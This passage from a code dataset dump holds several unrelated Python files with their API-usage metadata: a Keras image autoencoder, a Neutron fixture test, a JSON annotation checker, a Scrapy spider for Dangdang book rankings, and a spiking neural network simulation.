"flask.request.headers.get", "line_number": 314, "usage_type": "call"}, {"api_name": "flask.request.headers", "line_number": 314, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 314, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 316, "usage_type": "call"}, {"api_name": "app.route", "line_number": 310, "usage_type": "call"}, {"api_name": "flask.request.headers.get", "line_number": 320, "usage_type": "call"}, {"api_name": "flask.request.headers", "line_number": 320, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 320, "usage_type": "name"}, {"api_name": "flask.request.headers.get", 
"line_number": 321, "usage_type": "call"}, {"api_name": "flask.request.headers", "line_number": 321, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 321, "usage_type": "name"}, {"api_name": "flask.request.headers.get", "line_number": 322, "usage_type": "call"}, {"api_name": "flask.request.headers", "line_number": 322, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 322, "usage_type": "name"}, {"api_name": "flask.request.headers.get", "line_number": 323, "usage_type": "call"}, {"api_name": "flask.request.headers", "line_number": 323, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 323, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 325, "usage_type": "call"}, {"api_name": "app.route", "line_number": 318, "usage_type": "call"}, {"api_name": "flask.request.headers.get", "line_number": 339, "usage_type": "call"}, {"api_name": "flask.request.headers", "line_number": 339, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 339, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 341, "usage_type": "call"}, {"api_name": "app.route", "line_number": 337, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 346, "usage_type": "call"}, {"api_name": "app.route", "line_number": 343, "usage_type": "call"}, {"api_name": "app.run", "line_number": 349, "usage_type": "call"}]} {"seq_id": "23583105", "text": "from sklearn.cluster import KMeans\nimport keras\nfrom keras import Sequential, Model\nfrom keras.layers import Conv2D, UpSampling2D, MaxPool2D, Dense, Reshape, Flatten\nfrom keras import backend as K\nimport glob\nfrom PIL import Image\nfrom PIL.ImageOps import mirror\nimport matplotlib.pyplot as plt\nimport numpy as np # linear algebra\nimport pandas as pd # data processing, CSV file I/O (e.g. 
pd.read_csv)\nimport shutil\n\ntrain_df = pd.read_csv(\"input/train_relationships.csv\")\n\nM = 1000\ni = 0\nimage_datas = list()\nfor path in train_df.p1:\n    for f in glob.glob('input/train/' + path + \"/*.jpg\", recursive=True):\n        temp = Image.open(f)\n        image = temp.copy()\n        image_datas.append(image)\n        temp.close()\n        i += 1\n        if i == M:\n            break\n    if i == M:\n        break\n\nnp.random.shuffle(image_datas)\n\nfor i in range(len(image_datas)):\n    image_datas[i] = image_datas[i].resize((64, 64), Image.ANTIALIAS)\n\nfor i in range(len(image_datas)):\n    image_datas[i] = np.asarray(image_datas[i]) / 255.\nimage_datas = np.array(image_datas)\n\nencoder = Sequential([\n    Conv2D(filters=32, kernel_size=18, strides=1, activation=\"relu\", padding=\"same\", input_shape=(64, 64, 3)),\n    MaxPool2D(pool_size=2, padding=\"same\"),\n    Conv2D(filters=64, kernel_size=11, strides=1, activation=\"relu\", padding=\"same\"),\n    MaxPool2D(pool_size=2, padding=\"same\"),\n    Conv2D(filters=128, kernel_size=3, strides=1, activation=\"relu\", padding=\"same\"),\n    MaxPool2D(pool_size=2, padding=\"same\"),\n    Flatten(),\n    Dense(200),\n    Dense(100),\n    Dense(20),\n    Dense(8)\n])\ndecoder = Sequential([\n    Dense(20, input_shape=(8,)),\n    Dense(100),\n    Dense(200),\n    Dense(8192),\n    Reshape((8, 8, 128)),\n    UpSampling2D(2),\n    Conv2D(filters=64, kernel_size=3, strides=1, activation=\"relu\", padding=\"same\"),\n    UpSampling2D(2),\n    Conv2D(filters=32, kernel_size=11, strides=1, activation=\"relu\", padding=\"same\"),\n    UpSampling2D(2),\n    Conv2D(filters=3, kernel_size=18, strides=1, activation=\"sigmoid\", padding=\"same\")\n])\nautoencoder = Sequential([encoder, decoder])\n\nautoencoder.compile(loss=\"binary_crossentropy\", optimizer=\"adam\", metrics=[\"binary_crossentropy\"])\n\nbatch_size = 32\nepochs = 10\nlearning_rate = 0.1\n\nhistory = autoencoder.fit(image_datas.reshape(image_datas.shape), image_datas.reshape(-1, 64, 64, 3), batch_size, epochs, validation_split=0.2, verbose=1)\n\nplt.figure(figsize=(10,10))\nplt.plot(history.history['loss'])\nplt.plot(history.history['val_loss'])\nplt.title('model loss')\nplt.ylabel('loss')\nplt.xlabel('epoch')\nplt.legend(['train', 'test'], loc='upper left')\nplt.show()\n\nencoder.summary()\ndecoder.summary()\n\nn_img = 4\nind = np.random.choice(range(len(image_datas)), n_img)\npred = autoencoder.predict(image_datas[ind], batch_size)\n\nf, ax = plt.subplots(2, n_img, figsize=(10, 10))\nfor i in range(n_img):\n    ax[0][i].imshow(image_datas[ind[i]])\n    ax[1][i].imshow(pred[i])\n\n    # import winsound\n    # frequency = 440  # Set Frequency To 2500 Hertz\n    # duration = 1000  # Set Duration To 1000 ms == 1 second\n    # winsound.Beep(frequency, duration)\n    # winsound.Beep(440, 1000)\n", "sub_path": "trials.py", "file_name": "trials.py", "file_ext": "py", "file_size_in_byte": 3126, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "0", "api": [{"api_name": "pandas.read_csv", "line_number": 14, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 20, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 21, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 21, "usage_type": "name"}, {"api_name": "numpy.random.shuffle", "line_number": 31, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 31, "usage_type": "attribute"}, {"api_name": "PIL.Image.ANTIALIAS", "line_number": 34, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 34, "usage_type": "name"}, {"api_name": "numpy.asarray", "line_number": 37, 
"usage_type": "call"}, {"api_name": "numpy.array", "line_number": 38, "usage_type": "call"}, {"api_name": "keras.Sequential", "line_number": 40, "usage_type": "call"}, {"api_name": "keras.layers.Conv2D", "line_number": 41, "usage_type": "call"}, {"api_name": "keras.layers.MaxPool2D", "line_number": 42, "usage_type": "call"}, {"api_name": "keras.layers.Conv2D", "line_number": 43, "usage_type": "call"}, {"api_name": "keras.layers.MaxPool2D", "line_number": 44, "usage_type": "call"}, {"api_name": "keras.layers.Conv2D", "line_number": 45, "usage_type": "call"}, {"api_name": "keras.layers.MaxPool2D", "line_number": 46, "usage_type": "call"}, {"api_name": "keras.layers.Flatten", "line_number": 47, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 48, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 49, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 50, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 51, "usage_type": "call"}, {"api_name": "keras.Sequential", "line_number": 53, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 54, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 55, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 56, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 57, "usage_type": "call"}, {"api_name": "keras.layers.Reshape", "line_number": 58, "usage_type": "call"}, {"api_name": "keras.layers.UpSampling2D", "line_number": 59, "usage_type": "call"}, {"api_name": "keras.layers.Conv2D", "line_number": 60, "usage_type": "call"}, {"api_name": "keras.layers.UpSampling2D", "line_number": 61, "usage_type": "call"}, {"api_name": "keras.layers.Conv2D", "line_number": 62, "usage_type": "call"}, {"api_name": "keras.layers.UpSampling2D", "line_number": 63, "usage_type": "call"}, {"api_name": "keras.layers.Conv2D", "line_number": 64, "usage_type": "call"}, {"api_name": "keras.Sequential", "line_number": 66, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 76, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 76, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 77, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 77, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 78, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 78, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 79, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 79, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 80, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 80, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 81, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 81, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 82, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 82, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 83, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 83, "usage_type": "name"}, {"api_name": "numpy.random.choice", "line_number": 89, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 89, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 92, "usage_type": 
"call"}, {"api_name": "matplotlib.pyplot", "line_number": 92, "usage_type": "name"}]} {"seq_id": "41728479", "text": "# Copyright (c) 2015 Thales Services SAS\n# All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport fixtures\nimport testscenarios\n\nfrom neutron.tests import base\nfrom neutron.tests import tools\n\n\nclass NoErrorFixture(tools.SafeFixture):\n\n def __init__(self):\n super(NoErrorFixture, self).__init__()\n self.cleaned = False\n self.called = False\n\n def setUp(self):\n super(NoErrorFixture, self).setUp()\n self.called = True\n\n def cleanUp(self):\n self.cleaned = True\n super(NoErrorFixture, self).cleanUp()\n\n\nclass ErrorAfterFixtureSetup(NoErrorFixture):\n\n def setUp(self):\n super(tools.SafeFixture, self).setUp()\n raise ValueError\n\n\nclass ErrorBeforeFixtureSetup(NoErrorFixture):\n\n def setUp(self):\n raise ValueError\n\n\nclass TestSafeFixture(testscenarios.WithScenarios, base.BaseTestCase):\n scenarios = [\n ('testtools useFixture', dict(fixtures=False)),\n ('fixtures useFixture', dict(fixtures=True)),\n ]\n\n def setUp(self):\n super(TestSafeFixture, self).setUp()\n if self.fixtures:\n self.parent = self.useFixture(fixtures.Fixture())\n else:\n self.parent = self\n\n def test_no_error(self):\n fixture = NoErrorFixture()\n self.parent.useFixture(fixture)\n self.assertTrue(fixture.called)\n self.assertFalse(fixture.cleaned)\n\n def test_error_after_root_setup(self):\n fixture = ErrorAfterFixtureSetup()\n self.assertRaises(ValueError, self.parent.useFixture, fixture)\n self.assertTrue(fixture.cleaned)\n\n def test_error_before_root_setup(self):\n fixture = ErrorBeforeFixtureSetup()\n # NOTE(cbrandily); testtools.useFixture crashs badly if Fixture.setUp\n # is not called or fails.\n self.assertRaises(AttributeError, self.parent.useFixture, fixture)\n self.assertFalse(fixture.cleaned)\n", "sub_path": "neutron/tests/functional/test_tools.py", "file_name": "test_tools.py", "file_ext": "py", "file_size_in_byte": 2460, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "neutron.tests.tools.SafeFixture", "line_number": 23, "usage_type": "attribute"}, {"api_name": "neutron.tests.tools", "line_number": 23, "usage_type": "name"}, {"api_name": "neutron.tests.tools.SafeFixture", "line_number": 42, "usage_type": "attribute"}, {"api_name": "neutron.tests.tools", "line_number": 42, "usage_type": "name"}, {"api_name": "testscenarios.WithScenarios", "line_number": 52, "usage_type": "attribute"}, {"api_name": "neutron.tests.base.BaseTestCase", "line_number": 52, "usage_type": "attribute"}, {"api_name": "neutron.tests.base", "line_number": 52, "usage_type": "name"}, {"api_name": "fixtures.Fixture", "line_number": 61, "usage_type": "call"}]} {"seq_id": "17688858", "text": "import json\nimport os.path as osp\nimport sys\n\nids = list()\n\nfor line in open(osp.join('/home/wynmew/workspace/Data', 'trainSet')):\n ids.append(('/home/wynmew/workspace/Data', line.strip()))\n\nfor index in 
range(len(ids)):\n    img_id = ids[index]\n    annofile = osp.join(img_id[0], img_id[1]).replace(\"images\", \"annotations\").replace('.jpg', '.json')\n    with open(annofile) as datafile:\n        AnnoData = json.load(datafile)\n    #print(annofile)\n    # print(AnnoData)\n    try:\n        label=AnnoData[\"annotations\"][0][\"name\"]\n    except:\n        print(annofile)", "sub_path": "jsonchecker.py", "file_name": "jsonchecker.py", "file_ext": "py", "file_size_in_byte": 566, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "os.path.join", "line_number": 7, "usage_type": "call"}, {"api_name": "os.path", "line_number": 7, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 12, "usage_type": "call"}, {"api_name": "os.path", "line_number": 12, "usage_type": "name"}, {"api_name": "json.load", "line_number": 14, "usage_type": "call"}]} {"seq_id": "64046410", "text": "# -*- coding: utf-8 -*-\nimport scrapy\nfrom dangdang.items import DangdangItem\n\nclass DangSpider(scrapy.Spider):\n    name = 'dang'\n    allowed_domains = ['bang.dangdang.com']\n    start_urls = ['http://bang.dangdang.com/']\n\n    def start_requests(self):\n        base_url = 'http://bang.dangdang.com/books/bestsellers/01.00.00.00.00.00-month-2020-5-1-1'\n        for i in range(1,3):\n            url = base_url[:-1] + str(i)\n            yield scrapy.Request(url,self.parse)\n\n    def parse(self, response):\n        data_list = response.xpath('//ul[contains(@class,\"bang_list_mode\")]/li')\n        for data in data_list:\n            item = DangdangItem()\n            item['ranking'] = data.xpath('./div[contains(@class,\"list_num\")]/text()').extract_first()\n            item[\"book_name\"] = data.xpath('./div[@class=\"name\"]/a/text()').extract_first()\n            item[\"pic_url\"] = data.xpath('./div[@class=\"pic\"]/a/@href').extract_first()\n            item[\"comment_num\"] = data.xpath('./div[@class=\"star\"]/a/text()').extract_first()\n            item[\"publisher_time\"] = data.xpath('./div[@class=\"publisher_info\"][2]/span/text()').extract_first()\n            item[\"publisher_name\"] = data.xpath('./div[@class=\"publisher_info\"][2]/a/text()').extract_first()\n            item['price'] = data.xpath('./div[@class=\"price\"]/p[1]/span[1]/text()').extract_first()\n            yield item\n", "sub_path": "爬虫框架scrapy相关/dangdang/dangdang/spiders/dang.py", "file_name": "dang.py", "file_ext": "py", "file_size_in_byte": 1385, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "scrapy.Spider", "line_number": 5, "usage_type": "attribute"}, {"api_name": "scrapy.Request", "line_number": 14, "usage_type": "call"}, {"api_name": "dangdang.items.DangdangItem", "line_number": 19, "usage_type": "call"}]} {"seq_id": "537352290", "text": "import numpy as np\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nfrom sympy.solvers import solve\nfrom sympy import Symbol\nfrom matplotlib import patches\nimport matplotlib.patches as mpatches\nimport scipy.io as sio\n\n# plotting configuration\nratio = 1.5\nfigure_len, figure_width = 15*ratio, 12*ratio\nfont_size_1, font_size_2 = 36*ratio, 36*ratio\nlegend_size = 18*ratio\nline_width, tick_len = 3*ratio, 10*ratio\nmarker_size = 15\nplot_line_width = 5*ratio\nhfont = {'fontname': 'Arial'}\n\nsns.set(style='ticks')\n\n# simulation setup\ndt = 0.0001\nn_sec = 6\nT = int(n_sec/dt)\n\n# neuronal parameters\ntau_e, tau_i = 0.020, 0.010\n\n# network parameters\nn_exc, n_inh = 400, 100\n\n# network connectivity\nJ = np.zeros((n_exc+n_inh, n_exc+n_inh))\nJ[:n_exc, :n_exc] = 0.05\nJ[n_exc:, :n_exc] = 0.02\nJ[:n_exc, n_exc:] = 
0.05\nJ[n_exc:, n_exc:] = 0.03\n\nmask = np.random.choice([0, 1], size=(n_exc+n_inh, n_exc+n_inh), p=[0.8, 0.2])\nJ = np.multiply(J, mask)\nnp.fill_diagonal(J, 0)\nsio.savemat('data/spiking_neural_network/Fig_6S_Spiking_neural_networks_connectivity_matrix.mat', mdict={'connectivity_matrix':J})\n\n# membrane dynamics\nv_exc = 0.000 # e reversal potential\nv_rest = -0.070 # resting potential\nv_inh = -0.080 # i reversal potential\ntau_m_e = 0.020 # e membrane time constant\ntau_m_i = 0.010 # i membrane time constant\n\n# receptors\ntau_ampa = 0.005 # time constant for ampa\ntau_gaba = 0.010 # time constant for gaba\ntau_nmda = 0.100 # time constant for nmda\nalpha = 0.5 # weights for ampa and nmda, determine the overall exc conductance\n\n# firing threshold\nv_thr = np.ones(n_exc+n_inh) * (-0.050) # firing threshold\nv_spike_rest = -0.07 # resetting membrane potential after spike\nt_ref = 0.003 # refractory period\nt_allow_spike = np.zeros(n_exc+n_inh) # allowed spike timing\n\n# conductance based synapse\nv = np.ones(n_exc+n_inh) * (-0.070) # membrane potential\ng_inh = np.zeros(n_exc+n_inh) # inhibitory conductance\ng_ampa = np.zeros(n_exc+n_inh) # ampa conductance\ng_nmda = np.zeros(n_exc+n_inh) # nmda conductance\ng_exc = np.zeros(n_exc+n_inh) # exc conductance\n\ng_ext = np.zeros(n_exc+n_inh)\npre_spike_time = -100 * np.ones(n_exc+n_inh) # last spike timing\nt_allow_spike = np.zeros(n_exc+n_inh) # last spike timing\nb_last_spike = np.zeros(n_exc+n_inh)\n\nspike_mat = np.zeros((n_exc+n_inh, 10000))\nspike_mat_total = np.zeros((n_exc+n_inh, 60000))\nfr = np.zeros(n_exc+n_inh)\nfiring_mat = np.zeros((n_exc+n_inh, n_sec))\nidx = 0\nfr_idx = 0\n\nu_s = 0.2\ntau_x = 0.20\nx = np.ones((n_exc, n_exc))\n\nJ_EE = np.copy(J[:n_exc, :n_exc])\n\nfor i in range(T):\n t = dt * i\n t_prev = dt * (i - 1)\n if 20000 < i < 40000:\n g_e, g_i = 90, 30\n else:\n g_e, g_i = 30, 30\n\n g_ext[:n_exc] = np.random.random(n_exc) < (g_e*dt)\n g_ext[n_exc:] = np.random.random(n_inh) < (g_i*dt)\n\n # update recurrent input\n b_last_spike = (pre_spike_time == t_prev) # boolean indicate whether neurons spiked at last time step\n\n # E-E short-term plasticty\n x = x - u_s * x * np.tile(b_last_spike[:n_exc], (n_exc, 1))\n x = x * (x >= 0)\n x = x * (x <= 1)\n x = x + (1-x)/tau_x * dt\n x = x * (x >= 0)\n x = x * (x <= 1)\n\n J[:n_exc, :n_exc] = J_EE * x\n\n exc_input = np.dot(J[:, :n_exc], b_last_spike[:n_exc])\n inh_input = np.dot(J[:, n_exc:], b_last_spike[n_exc:])\n exc_input = exc_input + g_ext\n\n # update conductance\n g_inh = g_inh + (-g_inh / float(tau_gaba)) * dt + inh_input\n g_ampa = g_ampa + (-g_ampa / float(tau_ampa)) * dt + exc_input\n g_nmda = g_nmda + ((-g_nmda + g_ampa) / float(tau_nmda)) * dt\n g_exc = alpha * g_ampa + (1 - alpha) * g_nmda\n\n # seperate inhibitory and excitatory\n v[:n_exc] = v[:n_exc] + ((v_rest - v[:n_exc]) + g_exc[:n_exc] * (v_exc - v[:n_exc]) + g_inh[:n_exc] * (v_inh - v[:n_exc])) / float(tau_m_e) * dt\n v[n_exc:] = v[n_exc:] + ((v_rest - v[n_exc:]) + g_exc[n_exc:] * (v_exc - v[n_exc:]) + g_inh[n_exc:] * (v_inh - v[n_exc:])) / float(tau_m_i) * dt\n\n spike_info = (v > v_thr) & (t > t_allow_spike)\n spike_neuron_idx = np.where(spike_info)[0]\n spike_neuron_exc_idx = set(np.arange(0, n_exc, 1)).intersection(spike_neuron_idx)\n spike_neuron_inh_idx = set(np.arange(n_exc, n_exc+n_inh, 1)).intersection(spike_neuron_idx)\n pre_spike_time[spike_neuron_idx] = t\n t_allow_spike[spike_neuron_idx] = t + t_ref\n v[spike_neuron_idx] = v_spike_rest # reset membrane potential\n\n spike_mat[:, 
idx] = b_last_spike\n idx += 1\n if (i+1)%10000==0:\n fr_idx = int((i+1)/10000)-1\n plt.figure(figsize=(figure_len, figure_width))\n ax = plt.gca()\n ax.spines['top'].set_visible(False)\n ax.spines['right'].set_visible(False)\n ax.spines['bottom'].set_visible(True)\n ax.spines['left'].set_visible(True)\n for axis in ['top', 'bottom', 'left', 'right']:\n ax.spines[axis].set_linewidth(line_width)\n plt.tick_params(width=line_width, length=tick_len)\n\n for i in range(n_exc+n_inh):\n spike_bins = np.where(spike_mat[i, :] != 0)[0]\n if i < n_exc:\n plt.plot(spike_bins, np.ones(len(spike_bins))*i, 'bo', markersize=5) # excitatory neurons\n else:\n plt.plot(spike_bins, np.ones(len(spike_bins))*i, 'ro', markersize=5)\n\n spike_mat_total[:, fr_idx*10000:(fr_idx+1)*10000] = spike_mat\n fr = np.sum(spike_mat, 1)\n firing_mat[:, fr_idx] = np.copy(fr)\n plt.xticks(np.arange(0, 10000 + 2000, 2000), [0, 0.2, 0.4, 0.6, 0.8, 1.0], fontsize=font_size_1, **hfont)\n plt.yticks(np.arange(0, 500+50, 100), fontsize=font_size_1, **hfont)\n plt.xlabel('Time (s)', fontsize=font_size_1, **hfont)\n plt.ylabel('Neurons', fontsize=font_size_1, **hfont)\n plt.xlim([0, 10000])\n plt.ylim([0, 500])\n plt.savefig('paper_figures/png/Fig_6S_Spiking_neural_networks_EE_STP_' + str(int(t)) + '.png')\n sio.savemat('data/spiking_neural_network/Fig_6S_Spiking_neural_networks_EE_STP_' + str(int(t)) + '.mat', mdict={'spike_mat': spike_mat})\n spike_mat = np.zeros((n_exc+n_inh, 10000))\n idx = 0\n\nplt.figure(figsize=(figure_len, figure_width))\nax = plt.gca()\nax.spines['top'].set_visible(False)\nax.spines['right'].set_visible(False)\nax.spines['bottom'].set_visible(True)\nax.spines['left'].set_visible(True)\nfor axis in ['top', 'bottom', 'left', 'right']:\n ax.spines[axis].set_linewidth(line_width)\nplt.tick_params(width=line_width, length=tick_len)\n\nfor i in range(n_exc + n_inh):\n spike_bins = np.where(spike_mat_total[i, :] != 0)[0]\n if i < n_exc:\n plt.plot(spike_bins, np.ones(len(spike_bins)) * i, 'bo', markersize=2) # excitatory neurons\n else:\n plt.plot(spike_bins, np.ones(len(spike_bins)) * i, 'ro', markersize=2)\n\nplt.xticks(np.arange(0, 60000 + 10000, 20000), [0, 2, 4, 6], fontsize=font_size_1, **hfont)\nplt.yticks(np.arange(0, 500 + 50, 100), fontsize=font_size_1, **hfont)\nplt.xlabel('Time (s)', fontsize=font_size_1, **hfont)\nplt.ylabel('Neurons', fontsize=font_size_1, **hfont)\nplt.xlim([0, 60000])\nplt.ylim([0, 500])\nplt.savefig('paper_figures/png/Fig_6S_Spiking_neural_networks_EE_STP_total.png')", "sub_path": "src/Fig_6S_Spiking_neural_networks_2D_EE_STP.py", "file_name": "Fig_6S_Spiking_neural_networks_2D_EE_STP.py", "file_ext": "py", "file_size_in_byte": 7113, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "0", "api": [{"api_name": "seaborn.set", "line_number": 20, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 34, "usage_type": "call"}, {"api_name": "numpy.random.choice", "line_number": 40, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 40, "usage_type": "attribute"}, {"api_name": "numpy.multiply", "line_number": 41, "usage_type": "call"}, {"api_name": "numpy.fill_diagonal", "line_number": 42, "usage_type": "call"}, {"api_name": "scipy.io.savemat", "line_number": 43, "usage_type": "call"}, {"api_name": "scipy.io", "line_number": 43, "usage_type": "name"}, {"api_name": "numpy.ones", "line_number": 59, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 62, "usage_type": "call"}, {"api_name": "numpy.ones", 
"line_number": 65, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 66, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 67, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 68, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 69, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 71, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 72, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 73, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 74, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 76, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 77, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 78, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 79, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 85, "usage_type": "call"}, {"api_name": "numpy.copy", "line_number": 87, "usage_type": "call"}, {"api_name": "numpy.random.random", "line_number": 97, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 97, "usage_type": "attribute"}, {"api_name": "numpy.random.random", "line_number": 98, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 98, "usage_type": "attribute"}, {"api_name": "numpy.tile", "line_number": 104, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 113, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 114, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 128, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 129, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 130, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 139, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 139, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.gca", "line_number": 140, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 140, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tick_params", "line_number": 147, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 147, "usage_type": "name"}, {"api_name": "numpy.where", "line_number": 150, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 152, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 152, "usage_type": "name"}, {"api_name": "numpy.ones", "line_number": 152, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 154, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 154, "usage_type": "name"}, {"api_name": "numpy.ones", "line_number": 154, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 157, "usage_type": "call"}, {"api_name": "numpy.copy", "line_number": 158, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 159, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 159, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 159, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.yticks", "line_number": 160, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 160, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 160, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 161, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 161, "usage_type": "name"}, {"api_name": 
"matplotlib.pyplot.ylabel", "line_number": 162, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 162, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 163, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 163, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 164, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 164, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 165, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 165, "usage_type": "name"}, {"api_name": "scipy.io.savemat", "line_number": 166, "usage_type": "call"}, {"api_name": "scipy.io", "line_number": 166, "usage_type": "name"}, {"api_name": "numpy.zeros", "line_number": 167, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 170, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 170, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.gca", "line_number": 171, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 171, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tick_params", "line_number": 178, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 178, "usage_type": "name"}, {"api_name": "numpy.where", "line_number": 181, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 183, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 183, "usage_type": "name"}, {"api_name": "numpy.ones", "line_number": 183, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 185, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 185, "usage_type": "name"}, {"api_name": "numpy.ones", "line_number": 185, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 187, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 187, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 187, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.yticks", "line_number": 188, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 188, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 188, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 189, "usage_type": "call"}, {"api_name": 